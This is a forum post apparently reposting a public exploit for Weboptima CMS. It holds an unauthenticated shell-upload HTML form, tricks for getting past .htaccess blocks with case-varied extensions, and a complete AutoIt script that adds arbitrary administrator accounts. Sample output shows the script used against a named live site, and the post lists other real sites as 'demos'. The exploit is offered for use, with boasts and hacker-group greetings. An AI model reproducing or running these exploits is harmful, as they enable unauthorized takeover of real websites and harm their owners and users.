Jump to content
Praetorian503

Weboptima CMS Add Administrator / Shell Upload

By Praetorian503, in Exploituri

Recommended Posts

Praetorian503 Newbie

Praetorian503

Posted
Posted

Weboptima CMS suffers from add administrator and remote shell upload vulnerabilities.

#cs
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm AkaStep member from Inj3ct0r Team                  1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

weboptima_cms_remote_add_admin_shell_upload.au3

============================================
Vulnerable Software: Weboptima CMS
Vendor: http://weboptima.am/
Vulns: REMOTE SHELL UPLOAD AND REMOTE ARBITRARY ADD ADMIN.
Both Exploits are available(HTML exploit to upload shell)
And Autoit Exploit to add arbitrary admin accounts to target site.
More detailts below.
============================================

Few DEMOS:
http://navasards.am
http://olivergroup.am
http://iom.am
http://bluefly.am
http://invest-in-armenia.com
http://decart.am
http://armgeokart.am/

============================================
About Vulns:

1'ST vulnerability is REMOTE SHELL UPLOAD:
Any *UNAUTHENTICATED* USER CAN UPLOAD SHELL.
Vulnerable code:

//cms/upload.php
=============SNIP BEGINS======================
<?php
   $path="../uploades";
  if(!file_exists($path))
  {
    mkdir($path, 0777);
  }

  if(isset($_GET['name']))
  {
    unlink($path."/".$_GET['name']);
    $letter = $_GET['letter'];
    $selTypey = $_GET['selType'];
    header("Location: upload.php?letter=$letter&selType=$selTypey");
  }
?>
<?php include_once("start.php"); ?>
    <div align="center">
    <table align="center">
      <tr>
          <td colspan="3" align="center"><span class="title">????? ??????</span></td>
        </tr>
        <tr>
      <td>
      <?php
        if(isset($_POST['sub']))
        {
          $fileName = $_FILES["up_file"]['name'];
          $masSimbl = array('&','%','#');
          if(in_array($fileName[0], $masSimbl))
          {
            echo $fileName[0].' ???????? ?????? ????? ???????';
          }
          else
          {
            move_uploaded_file($_FILES["up_file"]['tmp_name'],"$path/".$_FILES["up_file"]['name']);
          }
        }
      ?>
========================SNIP ENDS=================




Simple HTML exploit to upload your shell:

<form method="post" action="http://CHANGE_TO_TARGET/cms/upload.php" enctype="multipart/form-data">
<input type="file"   name="up_file" />  <input type="submit" class="button" name="sub" value="send"></form>

After Successfully shell upload your shell can be found: http://site.tld/uploades/shellname.php

NOTE: There may be simple .htaccess to prevent you from accessing shell(HTTP 403).
This is not problem just upload your shell like:

myshell.PhP
or
myshell.pHp

OWNED.



2'nd vulnerability is: REMOTE ADD ADMIN
Any *UNAUTHENTICATED* USER CAN ADD ARBITRARY ADMIN ACCOUNT(s) TO TARGET SITE.
Vulnerable Code:
//cms/loginPass.php
Notice: header() without exit;*Script continues it's execution.*
==================SNIP BEGINS=========
<?php
session_start();
if($_SESSION['status_shoping_adm']!="adm_shop") {
  header("Location: index.php");
}
require_once('../myClass/DatabaseManeger.php');
require_once("../myClass/function.php");

$_POST = stripSlash($_POST);
$_GET = stripSlash($_GET);
?>
<?php
$error = "";
//And more stuff
==================SNIP ENDS=============

And here is exploit written in Autoit to exploit
this vulnerability and add admin to target site.


Exploit usage(CLI):

weboptima.exe http://decart.am AzerbaijanBlackHatzWasHere AzerbaijanBlackHatzWasHere


##############################################################
Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8)
Usage: weboptima.exe http://site.tld  username  password
[*]      DON'T HATE THE HACKER, HATE YOUR OWN CODE!      [*]
[@@@]           Vuln & Exploit By AkaStep               [@@@]
##############################################################
[+] GETTING INFO ABOUT CMS [+]
[*] GOT Response : Yes! It is exactly that we are looking for! [*]

##################################################
Trying to add new admin:
To Site:www.decart.am
With Username: AzerbaijanBlackHatzWasHere
With Password: AzerbaijanBlackHatzWasHere
##################################################

##################################################
Exploit Try Count:1
##################################################
Error Count:0
##################################################

##################################################
Exploit Try Count:2
##################################################
Error Count:0
##################################################
Count of errors during exploitation : 0

##################################################
[*] Yaaaaa We are Going To Travel xD           [*]
Try to login @
Site: decart.am/cms/index.php
With Username: AzerbaijanBlackHatzWasHere
With Password: AzerbaijanBlackHatzWasHere
*NOTE* Make Sure Your Browser Reveals HTTP REFERER!
   OTHERWISE YOU WILL UNABLE TO LOGIN!
##################################################
[*] Exit [*]
##################################################


#ce
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#NoTrayIcon
#include "WinHttp.au3"
#include <inet.au3>
#include <String.au3>

$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
'Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF  & _
'Usage: ' & @ScriptName &  ' http://site.tld ' & ' username  ' & 'password ' & _
@CRLF & "[*]      DON'T HATE THE HACKER, HATE YOUR OWN CODE!      [*]" & @CRLF & _
'[@@@]           Vuln & Exploit By AkaStep               [@@@]' & @CRLF & _StringRepeat('#',62);
ConsoleWrite(@CRLF & $exploitname & @CRLF)

$method='POST';
$vulnurl='cms/loginPass.php?test=' & Random(1,15677415,1);
Global $count=0,$error=0;
$cmsindent='kcaptcha'; # We will use it to identify CMS #;
$adminpanel='/cms/index.php';

;#~  Impersonate that We Are Not BOT or exploit.We are human who uses IE. Dohhh))# ~;
$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName &  ' http://site.tld ' & ' usernametoadd ' & 'passwordtoadd' & @CRLF
if  $CmdLine[0] <> 3 Then
  MsgBox(64,"",$msg_usage);
  ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
  exit;
EndIf


if $CmdLine[0]=3 Then
$targetsite=$CmdLine[1];
$username=$CmdLine[2];
$password=$CmdLine[3];
EndIf



if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then
  ConsoleWrite('Are you kidding me?');
  Exit;
EndIf


HttpSetUserAgent($useragent)
$doublecheck=InetGet($targetsite,'',1);
if @error Then
  ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)
  Exit;
EndIf


ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);
sleep(Random(1200,2500,1));



HttpSetUserAgent($useragent);
$sidentify=_INetGetSource($targetsite & $adminpanel,True);




if StringInStr($sidentify,$cmsindent) Then
  ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
Else
  ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)
  $error+=1;
EndIf




$targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')


priv8($targetsite,$username,$password,$count,$error);#~ do the magic for me plizzz));~#

Func priv8($targetsite,$username,$password,$count,$error)


$count+=1;~ #~ We are not going to exploit in infinitive manner xD #~;


Global $sAddress = $targetsite

$triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;
$whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF &  'To Site:' & $targetsite & @CRLF & 'With Username: ' & _
$username & @CRLF & 'With Password: ' & $password &  $triptrop;
if $count <=1 then ConsoleWrite($whatcurrentlywedo)

$doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count:' & $error & $triptrop;
ConsoleWrite($doitnicely);
Global $sPostData = "login=" & $username & "&password=" & $password & "&status=1" & "&add_sub=Add+New";


if $error>=2 OR $count>=2 Then
ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)

if int($error)=0 then
ConsoleWrite($triptrop & '[*] Yaaaaa We are Going To Travel xD           [*]' & _
@CRLF & 'Try to login @ '  & @CRLF  & _
'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: '  & _
$username & @CRLF & 'With Password: ' & $password & @CRLF & _
'*NOTE* Make Sure Your Browser Reveals HTTP REFERER!' & @CRLF & _
'   OTHERWISE YOU WILL UNABLE TO LOGIN!   ' & $triptrop & '[*] Exit [*]' & $triptrop);
exit;
Else

ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed?   [*]' & @CRLF & _
'[*] Anyway,try to login with new credentials. [*]' & @CRLF & _
'[*]  May be you are Lucky;)                   [*]' & _
@CRLF & 'Try to login @ '  & @CRLF  & _
'Site: ' & $targetsite & $adminpanel & @CRLF & _
'With Username: '  & $username & @CRLF & 'With Password: ' & $password &  $triptrop & '[*] Exit [*]' & $triptrop);

EndIf
exit;

EndIf



Global $hOpen = _WinHttpOpen($useragent);
Global $hConnect = _WinHttpConnect($hOpen, $sAddress)
Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');
_WinHttpAddRequestHeaders($hRequest, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8")
_WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5")
_WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
_WinHttpAddRequestHeaders($hRequest, "DNT: 1")
_WinHttpAddRequestHeaders($hRequest, "Referer: " & $targetsite & $vulnurl);# We need it #;
_WinHttpAddRequestHeaders($hRequest, "Cookie: ComeToPwnYou");#~ Not neccessary just for compatibility.Change or "rm" it if you want. #~;
_WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
_WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")
_WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));
_WinHttpSendRequest($hRequest, -1, $sPostData)
_WinHttpReceiveResponse($hRequest)

Global $sHeader, $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
    $sHeader = _WinHttpQueryHeaders($hRequest)
    Do
        $sReturned &= _WinHttpReadData($hRequest)
    Until @error

_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)

  $targetsite=StringMid($targetsite,5,StringLen($targetsite))
  Sleep(Random(10000,20000,1));
  priv8($targetsite,$username,$password,$count,$error);#~ Pass to function and TRY to Exploit #~;

Else
$error+=1;#~ iNCREMENT ERROR(s) COUNT. CUZ SOMETHING WENT WRONG ~#;

_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)

  $targetsite=StringMid($targetsite,5,StringLen($targetsite))
  Sleep(Random(10000,20000,1));
  priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#

EndIf

  EndFunc;=> priv8();


#cs

================================================
           KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep


#ce

Source: PacketStorm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...